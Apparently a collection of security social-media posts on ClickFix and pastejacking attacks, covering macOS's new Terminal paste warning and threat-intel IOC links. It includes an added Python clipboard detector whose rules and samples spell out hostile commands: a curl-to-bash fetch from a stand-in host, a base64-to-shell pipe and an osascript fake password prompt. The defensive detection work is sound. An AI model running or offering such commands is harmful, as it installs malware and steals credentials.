Has anyone been able to successfully replicate copying and pasting ClickFix/TerminalFix/*Fix commands into macOS Terminal to trigger this new-fangled malware warning? I have attempted numerous commands, from base64-encoded content to osascripts mimicking macOS infostealer prompts to cURL commands downloading remote content. I even replicated the command documented in the Tom's Guide article using the same tool in the same browser and it ran flawlessly in Terminal with no popup. And yes, I’m running Tahoe 26.4 on an M3. I’d like to think this would be a useful ‘stop-and-think’ mitigation but I can’t even consistently trigger it. And, per usual, Apple is tight-lipped on HOW they are detecting malicious commands so it’s likely to remain a black box mitigation. And yeah, I get it, the end user can just click right through the warning via a sneaky social engineering prompt. My goal was to try and build out detection logic to ID when a user gets hit with a prompt so I can at least investigate what the user tried to do and dig deeper into the threat. Since theoretically the user won’t run the command, it won’t get logged in SIEM/EDR tools. I need to rely on other mechanisms for detecting the paste event.

https://www.tomsguide.com/computing/online-security/i-tried-apples-new-security-feature-in-macos-that-warns-you-about-potential-clickfix-attacks-and-windows-should-take-note?utm_source=flipboard&utm_medium=activitypub

#macos #clickfix #terminalfix #threatintel #pastejacking #detectionengineering #threathunting

I put Apple’s new macOS ClickFix warnings to the test and they actually worked — now I want them on Windows too

New warning stops you before you potentially paste something dangerous

Tom's Guide
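As an added example (not code from the original post, and not Apple's detection logic, which the post notes is undocumented), one way to start on the detection goal described above: a heuristic classifier for clipboard content of the kind the Terminal warning targets, plus a pbpaste polling loop that emits JSON lines for a SIEM. The rule set, the scoring threshold and the sample strings are all assumptions made for this example.

```python
import json
import re
import subprocess
import time

# Heuristics for ClickFix/pastejacking-style clipboard content, constructed for
# this example; illustrative only, not Apple's (undocumented) detection logic.
RULES = [
    ("auto_execute_newline", re.compile(r"[\r\n]\s*$")),  # paste runs without pressing Enter
    ("hidden_chars", re.compile(r"[\u200b\u200c\u200d\u2060\ufeff]|\x1b\[")),  # zero-width / ANSI
    ("remote_pipe_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", re.I)),
    ("base64_decode_to_shell", re.compile(r"base64\s+(-d|-D|--decode).*\|\s*(ba|z)?sh\b", re.I)),
    ("osascript_password_prompt",  # fake credential dialog with a hidden-answer field
     re.compile(r"osascript.*display dialog.*hidden answer", re.I | re.S)),
]
HIGH_CONFIDENCE = {"remote_pipe_to_shell", "osascript_password_prompt"}

def classify_paste(text: str) -> dict:
    """Score one clipboard payload; returns matched rule names and a verdict."""
    hits = [name for name, rx in RULES if rx.search(text)]
    suspicious = len(hits) >= 2 or bool(HIGH_CONFIDENCE & set(hits))
    return {"hits": hits, "score": len(hits), "suspicious": suspicious}

def watch_pasteboard(poll_seconds: float = 0.5) -> None:
    """Poll the macOS pasteboard (pbpaste) and emit a JSON line for each suspicious change."""
    last = None
    while True:
        text = subprocess.run(["pbpaste"], capture_output=True, text=True).stdout
        if text != last:
            last = text
            verdict = classify_paste(text)
            if verdict["suspicious"]:
                # Log only a short preview: the clipboard often holds sensitive data.
                print(json.dumps({"ts": time.time(), **verdict, "preview": text[:120]}))
        time.sleep(poll_seconds)

# Constructed sample clipboard contents (example.invalid is a reserved test name).
SAMPLES = {
    "benign": "ls -la\n",
    "base64_to_shell": 'echo "aGVsbG8=" | base64 -D | sh\n',
    "curl_to_shell": "curl -fsSL https://example.invalid/x | bash",
    "fake_password_prompt": "osascript -e 'display dialog \"Enter password\" default answer \"\" with hidden answer'",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, classify_paste(text))
    # watch_pasteboard()  # uncomment on macOS to run the live monitor
```

This observes clipboard contents rather than Apple's warning or the paste event itself, so it also sees everything else the user copies; treat its output as a hunting lead, not a verdict.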

2025-04-22 (Tuesday): Always fun to find the fake CAPTCHA pages with the #ClickFix style instructions trying to convince viewers to infect their computers with malware.

Saw #StealC from an infection today.

Indicators available at https://github.com/malware-traffic/indicators/blob/main/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt

#ClipboardHijacking #Pastejacking

indicators/2025-04-22-IOCs-for-ClickFix-style-campaign-leading-to-StealC-infection.txt at main · malware-traffic/indicators

Indicators of Compromise (IOCs) from malware or suspicious network traffic - malware-traffic/indicators

GitHub

Social media post I wrote for my employer on other platforms.

2025-04-04 (Friday): Injected #KongTuke script in pages from legitimate but compromised websites leads to fake #CAPTCHA style pages and #ClipboardHijacking (#pastejacking). These pages ask users to paste script into a Run window. Latest info at

Information from an infection run earlier today at https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt

Of note, we can find legitimate websites with the injected #KongTuke script by pivoting on the KongTuke domain in URLscan:

https://urlscan.io/search/#lancasternh.com

Unit42-timely-threat-intel/2025-04-04-IOCs-forKongTuke-web-inject-leading-to-fake-CAPTHA-page.txt at main · PaloAltoNetworks/Unit42-timely-threat-intel

A collection of files with indicators supporting social media posts from Palo Alto Network's Unit 42 team to disseminate timely threat intelligence. - PaloAltoNetworks/Unit42-timely-threat-intel

GitHub

You won't like pastejacking, the technique cybercriminals use to sneak into your computer

The so-called "pastejacking" technique is back at the forefront of the cybercrime scene. It lets hackers deploy a sophisticated piece of malware, "named Darkgate", in a very sneaky way. A breakdown of this growing threat.

Clubic.com

@neil I use Tilix, and have it set to "Strip first character of paste if comment or variable declaration" - works 99% of the time - of course, one shouldn't just copy and paste from sites anyway #pastejacking